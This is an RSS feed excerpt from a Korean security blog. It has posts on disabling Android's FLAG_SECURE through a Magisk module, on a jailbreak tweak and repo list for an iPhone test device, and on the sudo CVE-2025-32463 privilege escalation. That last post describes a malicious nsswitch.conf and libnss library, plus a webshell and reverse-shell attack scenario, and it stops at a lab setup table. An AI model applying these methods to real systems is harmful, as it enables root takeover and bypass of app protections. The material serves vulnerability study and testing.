&lt;p data-ke-size=&quot;size16&quot;&gt;저장소 내 저장된 위 첨부파일을 선택하여 모듈 설치를 수행하고, 다시 시작을 진행한다.&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;938&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/kQxsr/dJMcag5hCyz/txhO0xOH2OxCAH8OsMSMd0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/kQxsr/dJMcag5hCyz/txhO0xOH2OxCAH8OsMSMd0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/kQxsr/dJMcag5hCyz/txhO0xOH2OxCAH8OsMSMd0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FkQxsr%2FdJMcag5hCyz%2FtxhO0xOH2OxCAH8OsMSMd0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;528&quot; height=&quot;938&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;938&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/td&gt;
&lt;td style=&quot;width: 50%;&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;938&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dGDUVT/dJMcag5hCyB/ZgTMA6cVfXXV06hMJclVZK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dGDUVT/dJMcag5hCyB/ZgTMA6cVfXXV06hMJclVZK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dGDUVT/dJMcag5hCyB/ZgTMA6cVfXXV06hMJclVZK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdGDUVT%2FdJMcag5hCyB%2FZgTMA6cVfXXV06hMJclVZK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;528&quot; height=&quot;938&quot; data-origin-width=&quot;528&quot; data-origin-height=&quot;938&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;디바이스 재부팅 이후, FLAG_SECURE 값으로 인하여 스크린샷이 불가하였던 어플리케이션에 대한 화면 캡처가 가능한 것을 확인할 수 있다.&lt;/p&gt;</description>
      <category>Tools/Android</category>
      <category>Android FLAG_SECURE</category>
      <category>FLAG_SECURE</category>
      <category>FLAG_SECURE disable</category>
      <category>FLAG_SECURE 비활성화</category>
      <category>Magisk Module</category>
      <category>메지스크 모듈</category>
      <category>안드로이드 스크린샷 안될 때</category>
      <author>Kai_HT</author>
      <guid isPermaLink="true">https://kaisec.tistory.com/84</guid>
      <comments>https://kaisec.tistory.com/entry/UnActivity-FLAGSECURE-in-Application#entry84comment</comments>
      <pubDate>Thu, 8 Jan 2026 01:36:51 +0900</pubDate>
    </item>
    <item>
      <title>iOS - Jailbreak Tweak List (arm64e)</title>
      <link>https://kaisec.tistory.com/entry/iOS-Jailbreak-Tweak-List-arm64e</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Sileo-Tweak.png&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;919&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/oXsmI/dJMcacaCMYE/EL5znK7DUO3eLHZP9DEEkK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/oXsmI/dJMcacaCMYE/EL5znK7DUO3eLHZP9DEEkK/img.png&quot; data-alt=&quot;Sileo TweakList&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/oXsmI/dJMcacaCMYE/EL5znK7DUO3eLHZP9DEEkK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FoXsmI%2FdJMcacaCMYE%2FEL5znK7DUO3eLHZP9DEEkK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1280&quot; height=&quot;919&quot; data-filename=&quot;Sileo-Tweak.png&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;919&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;Sileo TweakList&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;취약점 점검 시, 최소 iOS 버전이 15부터 지원되는 앱이 많아짐에 따라 iPhone X 로 점검용 디바이스를 새로 세팅하였다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이전에 사용하던 arm 계열 디바이스인 iPhone6S 에서 사용하던 Tweak 및 repo 가 지원중단됨에 따라 새로 세팅이 필요하여 정리했다.&lt;br /&gt;- 본인 디바이스 정보: iPhoneX (16.7.1), palera1n 탈옥&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Repo list&lt;/p&gt;
&lt;pre id=&quot;code_1766378428892&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;// Package Manager Repo
https://repo.palera.in/
https://getzbra.com/repo/

// Utilities Repo
https://tigisoftware.com/cydia/
https://apt.procurs.us/
https://repo.co.kr/
https://ellekit.space/
https://havoc.app/
http://apt.thebigboss.org/repofiles/cydia/
https://repo.chariz.com/

// Jailbreak Tweaks Repo
https://build.frida.re/
https://ios.jjolano.me/
https://poomsmart.github.io/repo/
https://cyida.inchitaso.com/
https://repo.kc57.com/&lt;/code&gt;&lt;/pre&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;Tweak List&lt;/p&gt;
&lt;pre id=&quot;code_1766378762132&quot; class=&quot;bash&quot; data-ke-language=&quot;bash&quot; data-ke-type=&quot;codeblock&quot;&gt;&lt;code&gt;AltList (opa334-BigBoss)
apt (Procursus Team)
apt-file (Procursus Team)
apt-utils (Procursus Team)
aptitude (Procursus Team)
Choicy (opa334-BigBoss)
ElleKit (Evelyn)
FakePass (alexia-palera1n)
Frida (Frida)
NewTerm 3 Beta (Chariz)
opa334 (ichitaso)
openssh (Procursus Team)
Phantom (eternal)
Shadow (jjolano)
TrollStore Lite (opa334)&lt;/code&gt;&lt;/pre&gt;</description>
      <category>Tools/iOS</category>
      <category>jailbreak repo list</category>
      <category>Jailbreak Tweak</category>
      <category>Jailbreak tweak list</category>
      <category>탈옥 레포</category>
      <category>탈옥 트윅</category>
      <category>탈옥 트윅 추천</category>
      <category>탈옥 트윅리스트</category>
      <author>Kai_HT</author>
      <guid isPermaLink="true">https://kaisec.tistory.com/83</guid>
      <comments>https://kaisec.tistory.com/entry/iOS-Jailbreak-Tweak-List-arm64e#entry83comment</comments>
      <pubDate>Mon, 22 Dec 2025 13:46:41 +0900</pubDate>
    </item>
    <item>
      <title>CVE-2025-32463</title>
      <link>https://kaisec.tistory.com/entry/CVE-2025-32463</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;6189f276-7940-4bea-bde0-d818f4c7bae9.png&quot; data-origin-width=&quot;1536&quot; data-origin-height=&quot;1024&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bdyAEg/btsPBjic44m/DsIsKg4BnuCYvtrGV1udNk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bdyAEg/btsPBjic44m/DsIsKg4BnuCYvtrGV1udNk/img.png&quot; data-alt=&quot;CVE-2025-32463&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bdyAEg/btsPBjic44m/DsIsKg4BnuCYvtrGV1udNk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbdyAEg%2FbtsPBjic44m%2FDsIsKg4BnuCYvtrGV1udNk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1536&quot; height=&quot;1024&quot; data-filename=&quot;6189f276-7940-4bea-bde0-d818f4c7bae9.png&quot; data-origin-width=&quot;1536&quot; data-origin-height=&quot;1024&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;CVE-2025-32463&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;지난 6월 30일 sudo 패키지 관련 취약점이 발표되었다. 해당 취약점은 sudo 버전 1.9.17 이전 버전에서 --chroot 옵션을 악용하여 일반 사용자가 루트 권한을 탈취할 수 있는 보안 결함이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;sudo 패키지에서 발생하는 로컬 권한 상승 취약점으로 볼 수 있으며 CVSSv3 점수 7.8-9.3 을 획득했다.&lt;/span&gt;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%; height: 84px;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 21.6279%; height: 21px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&lt;b&gt;기준&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 78.3721%; height: 21px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&lt;b&gt;해당 취약점 반영&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 21.6279%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&lt;b&gt;영향 버전&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 78.3721%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;1.9.14 ~ 1.9.17p1&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 21.6279%; height: 21px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&lt;b&gt;공격 벡터&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 78.3721%; height: 21px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;로컬 - AV:L&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 21.6279%; height: 21px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&lt;b&gt;공격 복잡도&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 78.3721%; height: 21px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;낮음 - AC:L&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 21px;&quot;&gt;
&lt;td style=&quot;width: 21.6279%; height: 21px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&lt;b&gt;필요 권한&lt;/b&gt;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 78.3721%; height: 21px;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;낮음 또는 없음 - PR:L/PR:N&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;영향 받는 버전은 &lt;b&gt;1.9.14 에서 1.9.17p1 미만 버전에서 발생&lt;/b&gt;되며, 레거시 버전은 1.9.14 이전 버전의 경우 chroot 기능이 포함되지 않아 영향받지 않는다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;chroot 경로 적용 시점이 문제가 되었는데, 1.9.14 버전에서 도입된 변경사항으로 인해 &lt;b&gt;sudoers 파일 평가 중에도 chroot 경로가 적용&lt;/b&gt;되었다.&amp;nbsp;&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;이때 공격자는 &lt;b&gt;NSS 설정 파일 - 사용자가 제어하는 디렉터리 내 /etc/nsswitch.conf 파일을 조작&lt;/b&gt;하여&lt;b&gt; 임의 공유 라이브러리를 로드&lt;/b&gt;하도록 sudo 를 속인다. 이후 일반 사용자가 &lt;b&gt;해당 라이브러리 로드를 통해 일반 사용자 계정으로 권한 상승&lt;/b&gt;이 가능하다.&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;결국 본 취약점의 경우, sudoers 정책 - 시스템 설정에서 &lt;b&gt;특정 명령어에 대해 chroot 실행이 허용&lt;/b&gt;되어야하나, 일반적으로 해당 파일에서 &lt;b&gt;chroot 지시자가 명시되어 위험&lt;/b&gt;하다 할 수 있다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;sudo가 sudoers 파일의 검증 과정에서 &lt;b&gt;사용자가 지정한 디렉터리로 chroot 를 수행&lt;/b&gt;, 해당 - 그러니까 대상 서버에 존재하는 &lt;b&gt;chroot 환경 내부 /etc/nsswitch.conf 파일을 참고&lt;/b&gt;하게 되고 공격자는 자신이 지정한 chroot 디렉토리 (쓰기 권한이 있는 디렉토리 등)에 &lt;b&gt;조작된 nsswitch.conf 파일과 악성 공유 라이브러리 등 (libnss_*.so 등)을 생성&lt;/b&gt;하여 sudo 가 이를 로드, &lt;b&gt;임의 명령으로 root 권한으로 실행하도록 유도&lt;/b&gt;가 가능하다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;즉, sudo 는 사용자가 특정 명령에 대한 실행 권한이 있는지 sudoers 파일을 통해 체크하는데, &lt;b&gt;sudoers 파일을 완전하게 평가하기 이전에&lt;/b&gt; 지정한 chroot 디렉토리로 &lt;b&gt;pivot_root - chroot 동작이 수행&lt;/b&gt;되며, /etc/nsswitch.conf 파일을 기준으로 &lt;b&gt;모듈 로딩이 수행&lt;/b&gt;된다. 이때 &lt;b&gt;chroot 내부 악성 nsswitch.conf 및 공유 라이브러리가 존재&lt;/b&gt;한다면 이를 &lt;b&gt;root 권한으로 로드 및 실행이 가능&lt;/b&gt;하다는 것이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;관련 함수로 &lt;b&gt;pivot_root&lt;/b&gt;, &lt;b&gt;set_cmnd_path&lt;/b&gt;, &lt;b&gt;command_matched&lt;/b&gt; 등이 있고, 본 함수들이 취약하며 &lt;b&gt;pivot_root 가 보안 정책 검증 - 허가 여부 검사 이전에 호출&lt;/b&gt;되어 문제가 발생하는 것이다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;요약&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;- 공격자가 &lt;b&gt;조작된 nsswitch.conf 와 악성 공유 라이브러리&lt;/b&gt; (libnss_*.so 등)을 만들고 &lt;b&gt;sudo 가 root 권한으로 이를 로드&lt;/b&gt;하게 만든다는 점.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;- 해당 과정에서 &lt;b&gt;sudoers 정책 검증 전&lt;/b&gt; &lt;b&gt;chroot 동작이 발생&lt;/b&gt;하여 우회가 가능하다는 점.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;- &lt;b&gt;&lt;span style=&quot;color: #ee2323;&quot;&gt;정책 검증 로직의 논리적 오류&lt;/span&gt; (chroot/파일 로딩 순서)&lt;/b&gt;로 인하여 발생한 취약점 이라는 점.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;&amp;rarr; &lt;b&gt;함수 호출 순서 및 보안 검증 타이밍이 잘못 설계&lt;/b&gt;되어 함수 자체 백엔드 구현 (권한 검사 및 파일 검증 등)에 대한 문제도 있지만 &lt;span style=&quot;color: #ee2323;&quot;&gt;&lt;b&gt;로직 흐름 설계 결함 (policy evaluatio 전 chroot 가 우선 실행되는 구조적 문제) 이 더 근본적인 원인&lt;/b&gt;&lt;/span&gt;이라고 할 수 있다.&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-style=&quot;style6&quot; data-ke-type=&quot;horizontalRule&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;우선 이론에 앞서 해당 CVE 에 대한 시나리오를 구상해보았다.&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style8&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;CVE-2025-32463_Sinario.png&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;720&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cnudqy/btsPCjBGg2m/1J0d8AnyqiWCzPBq0PiX20/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cnudqy/btsPCjBGg2m/1J0d8AnyqiWCzPBq0PiX20/img.png&quot; data-alt=&quot;CVE-2025-32463 Scenario 흐름&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cnudqy/btsPCjBGg2m/1J0d8AnyqiWCzPBq0PiX20/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fcnudqy%2FbtsPCjBGg2m%2F1J0d8AnyqiWCzPBq0PiX20%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1280&quot; height=&quot;720&quot; data-filename=&quot;CVE-2025-32463_Sinario.png&quot; data-origin-width=&quot;1280&quot; data-origin-height=&quot;720&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;CVE-2025-32463 Scenario 흐름&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;ol style=&quot;list-style-type: decimal;&quot; data-ke-list-type=&quot;decimal&quot;&gt;
&lt;li&gt;공격자는 서버 장악을 위해 업로드 취약점 구간을 이용하여 Webshell 형식 (명령 수행)의 쉘 파일 업로드를 수행함.&lt;/li&gt;
&lt;li&gt;업로드된 악성코드 쉘 파일을 이용하여 Reverse Shell 커넥션을 진행함.&lt;/li&gt;
&lt;li&gt;리버스 커넥션을 이용하여 서버 연결 이후, 설치된 sudo 버전을 확인, CVE-2025-32463 공격을 수행함.&lt;/li&gt;
&lt;li&gt;CVE 공격으로 root 권한이 탈취됨.&lt;/li&gt;
&lt;/ol&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;해당 시나리오에서 주의 사항은 다음과 같다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;1. sudoers 에 chroot 지시자 존재여부 확인&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;- 실제 공격을 위해 sudoers 파일 내 chroot 지시자가 명시되어야함. (ex. &lt;span style=&quot;background-color: #f6e199;&quot;&gt;ALL ALL=(root) NOPASSWD: /user/sbin/chroot /path/to/dir command&lt;/span&gt;) 해당 지시자가 존재하지 않는 경우, &lt;b&gt;우회 권한 상승이 불가&lt;/b&gt;함.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;- 본 실습 수행 시, 사전에 sudoers 파일을 chroot 지시자 추가를 위해 요구될 수도 있음.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;2. 악성파일 배치 및 실행 환경&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;- 임의 쓰기 권한이 있는 경로 내 조작된 nsswitch.conf 및 악성 libnss_*.so 파일 배치가 요구되며, 해당 경로 내 chroot 지정이 가능해야함.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;- 공격자의 임의 경로 지정 (리버스 쉘, 디렉터리 접근 등)이 불가할 경우, PoC 실패 가능성이 존재함.&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;- 공유 라이브러리 조작 시, 해당 서버의 아키텍처, libc 버전 등도 맞아야해서&amp;nbsp;&lt;b&gt;대상 서버 환경에 맞는 공유 라이브러리&lt;/b&gt;가 요구됨.&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-style=&quot;style8&quot; data-ke-type=&quot;horizontalRule&quot; /&gt;
&lt;h4 data-ke-size=&quot;size20&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;취약점 CVE-2025-32463 실습&lt;/span&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;실습환경 구성방법&lt;/p&gt;
&lt;figure id=&quot;og_1753857396431&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;article&quot; data-og-title=&quot;CVE-2025-32463 - Vulnerable App Settings&quot; data-og-description=&quot;취약점 CVE-2025-32463 에 대한 실습을 하기 위한 환경세팅 방법을 정리한 글이다.해당 취약점에 대한 정리에 대해 서술한 글의 경우, 아래 글을 참고하도록 하자.해당 취약점의 경우, 모의해킹이나 &quot; data-og-host=&quot;tistory.kaiht.kr&quot; data-og-source-url=&quot;https://kaisec.tistory.com/entry/CVE-2025-32463-Vulnerable-App-Settings&quot; data-og-url=&quot;https://tistory.kaiht.kr/entry/CVE-2025-32463-Vulnerable-App-Settings&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/zuTxV/hyZqXbzP5R/dCoycz4bIonvKyR815ZTUk/img.png?width=800&amp;amp;height=600&amp;amp;face=0_0_800_600,https://scrap.kakaocdn.net/dn/JR9Cj/hyZqPdxwnY/XxNp9gbplbjkcA3lM4SSwk/img.png?width=800&amp;amp;height=600&amp;amp;face=0_0_800_600,https://scrap.kakaocdn.net/dn/L3rRR/hyZrrQUijL/ibgqnT3hQsZwa6CtiYT331/img.png?width=1244&amp;amp;height=933&amp;amp;face=0_0_1244_933&quot;&gt;&lt;a href=&quot;https://kaisec.tistory.com/entry/CVE-2025-32463-Vulnerable-App-Settings&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://kaisec.tistory.com/entry/CVE-2025-32463-Vulnerable-App-Settings&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/zuTxV/hyZqXbzP5R/dCoycz4bIonvKyR815ZTUk/img.png?width=800&amp;amp;height=600&amp;amp;face=0_0_800_600,https://scrap.kakaocdn.net/dn/JR9Cj/hyZqPdxwnY/XxNp9gbplbjkcA3lM4SSwk/img.png?width=800&amp;amp;height=600&amp;amp;face=0_0_800_600,https://scrap.kakaocdn.net/dn/L3rRR/hyZrrQUijL/ibgqnT3hQsZwa6CtiYT331/img.png?width=1244&amp;amp;height=933&amp;amp;face=0_0_1244_933');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;CVE-2025-32463 - Vulnerable App Settings&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;취약점 CVE-2025-32463 에 대한 실습을 하기 위한 환경세팅 방법을 정리한 글이다.해당 취약점에 대한 정리에 대해 서술한 글의 경우, 아래 글을 참고하도록 하자.해당 취약점의 경우, 모의해킹이나&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;tistory.kaiht.kr&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;취약점 &lt;i&gt;CVE-2025-32463&lt;/i&gt; 에 대한 환경구축 이후 취약점 분석은 다음과 같이 수행된다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;실습환경 대상목록&lt;/span&gt;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot; data-ke-style=&quot;style12&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 20.8914%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;대상&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 18.7984%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;IP&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 60.3101%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;비고&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 20.8914%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;공격 대상 게시판 사이트&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 18.7984%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;10.89.0.19&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 60.3101%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;게시판 웹 서비스 (업로드 취약점 존재)&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;컨테이너 환경&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;Local IP&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 20.8914%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;공격자 IP&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 18.7984%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;119.xx.yy.185&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 60.3101%;&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light';&quot;&gt;공격대상 서버와 다른 네트워크&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
